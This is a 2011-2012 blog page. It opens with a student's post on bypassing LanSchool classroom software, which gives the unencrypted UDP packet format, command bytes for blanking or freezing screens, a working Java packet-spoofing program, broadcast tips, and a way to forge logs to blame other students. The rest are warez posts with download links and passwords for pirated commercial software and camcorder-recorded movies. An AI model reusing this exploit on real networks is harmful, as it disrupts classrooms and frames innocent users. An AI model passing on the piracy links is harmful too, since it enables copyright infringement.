Tuesday, January 10, 2012

How To Bypass Lanschool

The Story
During grade 12 i chaged schools, the new school i whent to had alot better networks and computer labs witch was a good thing, or so i thought. After playing around for a bit i noticed a litte green icon in the tast bar that did not seem to do anyting. Looking feathure in to this i found out it was a progame named LanSchool (http://www.lanschool.com/). Now what is LanSchool you mayask, the names makes it sound insent enought, maybe somthing to help students? Well it may have started out that way but what it has become is basiclky a toringhorse progame for teachers to use to watch everything you are doing (incduing watching your screen) as well as giving them the ablity to control your computer or all computers in the lab at the same time. As ushealy the school borad decsied to spend money on somthing they could get for free and got a crapyer verson then what they could get for free.

So i started looking in to LanSchool more and found a demo verson on there site. This demo verson could not interact with real versons the school used and whould not allow studens to do any damge. 1st i looked in to how it was effecting the regiersy of the computers it was on, and found that every time the teacher application sent a comand to the student versons it recored what windows user sent the comand, the windows name of the computer they where on and the time in all regersitrys of every comp on the network. This ment that finding a full verson of the software althougth not hard whould end you up in alot of trouble unless you brought your own computer to school and even then still could.

So i begain to look at the packets it was send and to my shock they where UDP and not TCP and they had no ecription or coding at all to them. This means that it is exteramly easy to spoof the packets. So i quiclky wrote up a simple java progame to test out my theroy. Affter some time and exmermentation i decoded what most of the packets ment and was able to control the demo verson of LanSchool. Affter looking more at the packets i noticed that the difrces between the demo verson and the real verson is that the demo verso uses only one chanale witchis never used by the real verson. So it was simple a madder of chaing the chanel byte to a real chanle in the packet to get it to work with most if not all versons of LanSchool. Also this allowed me to make the regeisty logs say what ever i whonted, incuding blaming other stutdents for the hack.

Now being the nice guy that i am i e-maied my findings to LanSchool and sugested several ways to fix this expolite. There repsoses was basiclky saying that they whould rather send time and effort enforcing the rules of the school and the law then fixing there progame. And made threats that legal aucation as well as sudesnions could take place if i where to use this progame. So next i whent to my school and aucatly demstorated (with there permision) the expoite and how unscure it was. Again nothing happend with my efforts so amoth latter i published how the packet worked on compsci.ca.

It is now almost 2 years latter and i have rewriten my hack so any one even script kiddys can use it. With a nice gui and everything. My hope by doing this is to teach peoleop why progaming like LanSchool did is bad security wise and to encorge the school borad to buy (if they most) better software from comapnys that know what they are doing and are willing to chage with the times. BTW LanSchools website still claims that there are no know bugs with LanSchool.


The Packet
This is what the packet looks like:

Mode | Version | Channel [to blocks] |00 or DF |DA | D1| ___data here__|__log info__|

Mode is basickly the comand you are send so far i have found alot of them and here are some expamles: 


    00 - start boradcast of screens
    04 - restore computer screens
    07 - blaken all screens
    08 - unload lanschool or just frezz it up good 


The verson corposneds to what verson of lanschool you are runing versons 5.x seem to like 01 and 02 seems to be for 6.x

The channel area is prity simple, it is the channel number. The demo verson uses channel FF in hex or 255 in dec.

The next 3 bytes are kind of hard to figgure out but seem to allways be the same in the give verson of lanschool. For 5.x and the low 6.xs the 1st byte here should be 00 for 6.5 and some others it should be DF in hex. The other 2 seem to allways be the same.

The data area is data for that comand, some comands do not need this like blacken all screens.

The log area is where it puts the name of your computer and then your username for loging. This area also has alot of useless 00 bytes that just take up space.


Application of the above
The falowing is a very simple java application that will take adavagte of the above infomration to black out screens for the demo verson of 6.5 of lanschool only on the computer you are using. To send to all computers in a network you could use the ip 255.255.255.255

code:

public class LanHack
{
   public static void main(String args[])
   {
      try
      {
         InetAddress ipaddr=InetAddress.getByName("120.0.0.1");
         DatagramSocket mysocket=new DatagramSocket();
         byte sendbuf2[] = {(byte)0x07,(byte)0x02,(byte)0xff,(byte)0x3f,(byte)0xda, (byte)0xd1};
         DatagramPacket sendPacket2 = new DatagramPacket( sendbuf2, sendbuf2.length, ipaddr, 796);   
         mysocket.send(sendPacket2);
      }catch(Exception e){}
   }


Note that for lesser verson of lanschool you whould have to chage the 0x3f to 0x00 and posibley 0x02 to 0x01 or another number. Aslo this is set to the demo chan 0xff and if u whonted to send to a real verson you whould have to set it to 0xChanNumberInHex.


LanSchooled
Now for what i did with all this knogagel to make a point and click lanschool hack that can help you understand how the packets work. Rember that this is only for educational use and should not be used for evil purposes and i take no respoblity for what you do with it. With that side, i only tested it on the demo verson but i whould like to hear from peoleop if they got it to work on other versons.

How to use
The top frame shows the packet that will be sent, you can use the easy set up buttions below it to set the packet to do what you whont. The times bar will let you say how many times you whont to send out the packet.

Seting the channel to "ALL" will send to all posiable lanschool channels incuding the demo one. Seting the verson to "9" will send a verson 2 but with 0x00 rather then 0xdf. Seting to "2" will send verson 2 but with 0xdf. All other verson numbers send there verson and 0x00.

The log info lets you set what to set the name and comp name of in the regersity logs of the computers effected. I whould storgy remocmend peoleop not expoit this to get peoleop in thoruble since that is just evil.

You most hit send to aucatly send the packet. The easy set up buttions just configer the packet you are going to send.

Where to get
An windows excubalte, excubalte jar and the java sorce code have all been incudned in this post and should appaer below. In all cases you need java or a JVM instaled.


Edit: Also see http://www.compsci.ca/wiki/index.php?title=LanSchool 


The Extension 'jar' was deactivated by an board admin, therefore this Attachment is not displayed.


The Extension 'exe' was deactivated by an board admin, therefore this Attachment is not displayed.


The Extension 'class' was deactivated by an board admin, therefore this Attachment is not displayed.


LanSchooled.java
 Description:
The java sorce code

No longer works. Flaw fixed in v7.0 of lanschool.

This is not a copy of LanSchool and in no way replaces it or does the same thing.

Download
 Filename: LanSchooled.java
 Filesize: 13.41 KB
 Downloaded: 2195 Time(s)

Thursday, January 05, 2012

Shadow Protect Desktop Edition


Shadow Protect Desktop Edition 4.1.5.9359 | 328.5 Mb
 
Fastand Reliable Disaster Recovery, Data Protection and System Migrationfor Windows Desktops and Laptops. Avoid System and Data Loss withShadowProtect Desktop.

About StorageCraft Technology Corporation
StorageCraftTechnology Corporation is a premier software company focused on helpingyou backup fast and recover faster. StorageCraft develops innovativedisk-based backup, disaster recovery, system migration, data protectionand security solutions for servers, desktops and laptops.

StorageCraftdelivers software products that reduce downtime, improve security andstability for systems and data and lower the total cost of ownership forsystems in your computing environment. Located in Draper, Utah, U.S.A.,StorageCraft was founded in 2004.

ShadowProtect Desktop provides the following benefits:
- Rapid recovery from bare metal, to dissimilar hardware or to and from virtual environments.
- Centralized backup administration from a management console.
- ShadowProtect ImageManager to automatically consolidate backup image files.
- Verification and re-verification of backup images.
- VirtualBoot technology for quick failover to a virtual server.
- Converter tool to convert to .VHD or .VMDK.
- Automatic backup of SQL, Exchange and other critical applications.
- Granular recovery of individual files and folders in moments.
- Simplified migration to new Windows servers.
- Scheduler for automatic full and incremental backups.

Supported File Systems/Disk/Volume Types
ShadowProtectEditions support the following File Systems: FAT16, FAT16X, FAT32,FAT32X, NTFS, MBR Disks, GPT Disks, Basic and Dynamic Volumes and Disks.

Supported Storage Media
ShadowProtectsupports the following storage media: Disk drives including networkdrives, SAN, NAS, iSCSI, SCSI, USB or Firewire, Solid State Disks (SSD),and optical media such as CD/DVD/Blu-Ray.

Changelog (ShadowProtect version 4.1.5):

- Features/Enhancements
Thereare no new features for this maintenance release. See section 6 for adescription of the fix in this 4.1.5 release. If you are notexperiencing any issues with your current ShadowProtectDesktop/Server/SBS Edition 4.1.0 installation, then there is no need foryou to upgrade to this 4.1.5 maintenance release.

- Issues Resolved
A bug has been fixed which caused high CPU and network utilization if a backup destination object became inaccessible.

Support :
Interface: english
OS: Windows XP / Vista / Seven 
 

http://www.fileserve.com/file/rsD9nPD/Scsp...ll_sw.part1.rar
http://www.fileserve.com/file/ZCwZRJB/Scsp...ll_sw.part2.rar
http://www.fileserve.com/file/Kkyx4Xj/Scsp...ll_sw.part3.rar
http://www.fileserve.com/file/wzBRqB5/Scsp...ll_sw.part4.rar
Note :
Use the link below to download genarator order process
download as premium and Copas link above TSB here
Fileserve Link Generator

Saturday, December 31, 2011

USB Disk Security 6.0.0.126


USB Disk Security 6.0.0.126 | 4.5 Mb
USB Disk Security provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection. USB Disk Security is the best antivirus software to permanently protect offline computer without the need for signature updates, but other antivirus software should update signature database regularly, and they cannot effectively protect offline computer.

This light and easy to use solution is 100% compatible with all software and doesn't slow down your computer at all. You pay USB Disk Security once and get it all, however, other antivirus products should be paid for updates every year.

Product Highlights:
>> 100% protection against any malicious programs via USB storage
USB Disk Security uses innovative proactive technology to block any threats via USB drive. There are relatively few products available in shops or on the Internet which offer even close to 100% protection against any malicious programs via USB drive. The majority of products are unable even to guarantee 90% protection. USB Disk Security is the world's best software to block threats via USB drive.

>> The best solution to protect offline computer
Other antivirus software should update signature database regularly, and they cannot effectively protect offline computer that is not connected to the Internet. When new viruses, worms and other malicious attacks strike, traditional signatures are insufficient. Every minute one waits for a virus signature update creates a window of vulnerability that could have devastating consequences. USB Disk Security uses advanced proactive detection techniques, requires no signature updates, and closes the window of vulnerability left open by other reactive, signature-based responses.

>> The world's fastest and smallest antivirus software
With USB Disk Security, it’s not necessary to sacrifice speed for detection and scanning. Compare antivirus software and you'll discover that USB Disk Security is by far one of the smallest applications in the industry. For example, the v5.0 of USB Disk Security installer is just 1 MB. The program utilizes approximately 1 to 7 MB of RAM.

>> 100% compatible with all software
Incompatibility between antivirus programs is an issue. In the vast majority of cases, installing two antivirus programs from different vendors on one machine (for increased protection) is technically impossible, as the two programs will disrupt each other's functioning. However, USB Disk Security is 100% compatible with all software, including Windows Vista.

>> Simple to use
USB Disk Security has been specifically designed to perform effectively regardless of the user’s level of computer expertise. Just install and forget it.
Khaizker Code
Password mediafire :
andystonecold
Share
4.4 / 5 - 393 vote(s).

FlashBoot v1.4.0.157


FlashBoot v1.4.0.157 | 3.94 Mb
FlashBoot is a tool to create bootable USB disks, USB Flash Memory keys and cards mainly.

What are the benefits of such devices for you? Let’s see:

unlike the most bootable medias, bootable USB Flash keys are very handy: compared to floppies, they have much bigger size, speed and reliability, compared to CD-ROMs, they are random write access devices, so you can backup your data to the same media where you booted from, without need to reformat (reburn) the entire media. Again, the cost per megabyte for them continues to cut down, which is not the case for CD-ROMs and floppies.

And the most important thing is that you can use bootable USB Flash Disk almost everywhere, on any PC that has USB port. Are you going to repair your PC at your work without CD-ROMs, floppies or other media? No problems anymore.

Or you have a laptop but without a CD-ROM drive? Even if with a CD-ROM drive, you can’t work with it for a long time: boot device is accessed quite often, and battery power is obviously not enough to supply laser for a long time. Perhaps you are home user with a desktop PC. And you are ready to repair it with your favorite bootable CD-ROM, OK. But what if CD-ROM drive fails? Will you be able to boot or to get your backup data back?

With bootable USB Flash Memory key, you may boot every PC with USB ports, regardless of non-present or broken devices, because there’s no need for any extra devices. You don’t have a media size limit of 700 or 800 MB anymore, and buy a big or a small disk depending on your needs.

Just after boot, on every PC, you may save your files to the same device from which you booted, or restore them back. There’s no need to reformat (reburn) the boot disk, you just copy files and folders, and there’s no need for extra hardware for such operations. Of course you may do some things you can’t do under your OS: copy/modify system files (they are busy when OS is running), reinstall OS, repartition your main hard disk etc.

FlashBoot is a tool that makes USB disks bootable. It was specially designed to work with USB Flash devices. It is used to reformat flash disk (that’s optional) and transfer system files to it.

You have many options for your choice :

Convert BartPE bootable CD-ROM to bootable USB disk
transfer DOS kernel only (you may get the files from installed Windows 9x, from Windows 9x setup folder, or use built-in FreeDOS)

Convert floppy disk to USB Flash disk (a diskette or an image file may be used)
convert a bootable CD-ROM to USB Flash disk (again images are supported). There are some technical difficulties with supporting any type of CD-ROM here, see details below. But there should be no troubles with the most real cases. You may convert Knoppix and EBCD, for instance.

Create Windows NT/2000/XP password recovery disk
create disk with NT/2000/XP bootloader. It would be useful when you have mistakenly configured it, and boot.ini file was left on unreachable disk (NTFS).
duplicate USB flash disk. Just creates a copy of existing disk USB flash disk, different sizes of source and destination medias are OK.

Types of convertible CD-ROMs include so-called 1.44-floppy emulation bootable CD-ROMs and no-emulation CD-ROMs based on ISOLinux.

FlashBoot is designed to be compatible with all types of bootable USB Flash disks, i.e. it is not binded to Transend, Kingston, HP, or to any other particular manufacturer of USB Flash disks.

FlashBoot is designed to be compatible with most of the BIOSes. Some of them require USB disk to be partitioned (USB-HDD mode), some of them require superfloppy format (USB-ZIP mode). You may choose disk format type between partitioned disk and superfloppy, when formatting your USB Flash disk with FlashBoot (if you choose to reformat). You may write the output to image file, transfer it to another PC and write it to physical device there (either with FlashBoot or with any other suitable tool, for example, with Linux dd command).
Khaizker Code
Password Mediafire :
andystonecold

Sunday, December 04, 2011

Windows 7 Themes: World of Warcraft


I proudly present:

World of Warcraft

Windows 7 Themes: World of Warcraft by TheBull-picture5.jpg

Windows 7 Themes: World of Warcraft by TheBull-picture6.jpg

Windows 7 Themes: World of Warcraft by TheBull-picture7.jpg

Windows 7 Themes: World of Warcraft by TheBull-picture8.jpg

Includes:

Theme Installer
Various wallpapers
Sound Scheme
Explorerframe images (Make sure you have the Theme Resource Changer installed!)
Rocketdock skin by philipyeldhos The Guardians - RocketDock.com
WoW cursorpack. Pre-intalled, by yingjunjiu World of WarCraft cur by `yingjunjiu on deviantART
StartOrb
Shell32 Images
Theme Resource Changer
UniversalThemePatcher for 32&64 bit systems
TaskDock_by_Solo_Dev (Please use this to center your icons on your taskbar.)
Explorer Window image instructions (Use this, and follow instructions included on how to enable the WoW image in your explorer windows.)

Logon screen by YourNumr1Fan. (Thanks bud!)
Windows 7 Themes: World of Warcraft by TheBull-wow-wotlk.jpg

Get it here: 
http://creativx.net/forums/logon-scr...lich-king.html

Credits:

Some images are from our WoW forum skin. Credit to ToDieFour WoW WoLK
(Thanks for the permission Kirk!)
Top image of startmenu is originally from this Windowsblinds XP theme
http://browse.deviantart.com/customi...?q=WoW#/d9p4vz (Adapted by me for this)

Copyright:
World of Warcraft ©2004-2008 Blizzard Entertainment, Inc. All rights reserved.
All images and World of Warcraft related content are protected by copyright law and are registered by Blizzard Entertainment, Inc.
This website is in no way related to World of Warcraft, Blizzard Entertainment Inc or any of its associates and partners.

BLIZZARD

Enjoy!


UPDATE 10/05/2011

I made 2 extra msstyles for this theme.

First one: Updated startmenu. A big thanks to tono3022, for the inspiration and some images is from his diablo theme.
Windows 7 Themes: World of Warcraft by TheBull-no-shadow.jpg

Second one: Updated startmenu with extra shadow around the explorer windows.


Windows 7 Themes: World of Warcraft by TheBull-frames.jpg

PLEASE TAKE NOTE THAT THIS DOWNLOAD CONTAINS ALL

3 THEMES. SO IF YOU WANT TO USE ANY OF THE 3, JUST

DELETE THE PREVIOUS DOWNLOAD'S FOLDERS AND DROP

THESE IN THERE.


UPDATE: 18/05/11

As per AlphaR11's request. Narrow startmenu at normal position.
Windows 7 Themes: World of Warcraft by TheBull-picture1.jpg

Just run the .exe (It will install it separately, so you can still choose to use any of the other versions.)

Thursday, December 01, 2011

Puss In Boots


Puss in Boots (2011) TS 325MB
http://www.imdb.com/title/tt0448694/
[FORMAT]:…………………..[ Matroska
[GENRE]:……………………[ Adventure | Animation | Comedy | Fantasy
[FILE SIZE]:………………..[ 325 MB
[NO OF CDs]:………………..[ 1
[RESOLUTION]:……………….[ 720x304
[LANGUAGE ]:………………..[ English
[SUBTITLES]:………………..[ none
[RELEASE RUNTIME]:…………..[ 1h 20mn
[SOURCE]:…………………..[ Puss.in.Boots.2011.TS.XviD-MiSTERE
[iMDB RATING]:………………[ 6.7/10
[Encoder]:………………[ nItRo


Download:
Pass: 300mbfilms.com

Immortals


Immortals (2011) DVDScr 400MB
http://www.imdb.com/title/tt1253864/
[FORMAT]:…………………..[ Matroska
[GENRE]:……………………[ Action | Drama | Fantasy
[FILE SIZE]:………………..[ 400 MB
[NO OF CDs]:………………..[ 1
[RESOLUTION]:……………….[ 720x334
[LANGUAGE ]:………………..[ English
[SUBTITLES]:………………..[ none
[RELEASE RUNTIME]:…………..[ 1h 42mn
[SOURCE]:…………………..[ Immortals 2011 DVDScr XVID AC3 V1 – SPEEDY
[iMDB RATING]:………………[ 6.8/10
[Encoder]:………………[ nItRo


Download:
Pass: 300mbfilms.com

Sunday, November 27, 2011

Adobe Flash Professional CS5


Adobe Flash Professional CS5 | 860 Mb
Adobe Flash Professional CS5 software is the industry standard for interactive authoring and delivery of immersive experiences that present consistently across personal computers, mobile devices, and screens of virtually any size and resolution.

Adobe® Flash® Professional CS5 software combines expressive design features like a new multilingual text engine and more realistic inverse kinematics effects with timesaving development features like extensible code snippets and enhanced ActionScript authoring options.

What s new in Flash Professional CS5 :

Code Snippets panel new
Reduce the ActionScript 3.0 learning curve and enable greater creativity by injecting prebuilt code into projects.

ActionScript editor
Speed the development process with an improved ActionScript editor, including custom class code hinting and code completion.

Creative Suite integration
Enhance productivity when using Adobe Creative Suite® components such as Adobe Photoshop , Illustrator , InDesign , and Flash Builder .

Flash Builder integration
Use Flash Builder as your primary ActionScript editor for Flash Professional projects.

Video improvements
Streamline video processes with on-stage video scrubbing and a new cue points property inspector.

Design immersive interactive experiences
Import your design from Photoshop CS5 Extended or Illustrator CS5 and then add interactivity and motion with Flash Professional to bring your work to life.

XML-based FLA source files
Manage and modify projects using source control systems and collaborate on files more easily.

Wide content distribution
Publish content virtually anywhere, using Adobe AIR® for desktop applications and mobile platforms including the iPhone®*, or Adobe Flash Player for browser-based experiences.
Subject to Apple s current requirements and approval.

Spring for Bones new
Create more realistic inverse kinematic effects with new motion attributes added to the Bones tool.

Deco drawing tools
Add advanced animation effects with a new comprehensive set of brushes for the Deco tool.


Khaizker Code
Password Mediafire :
 
andystonecold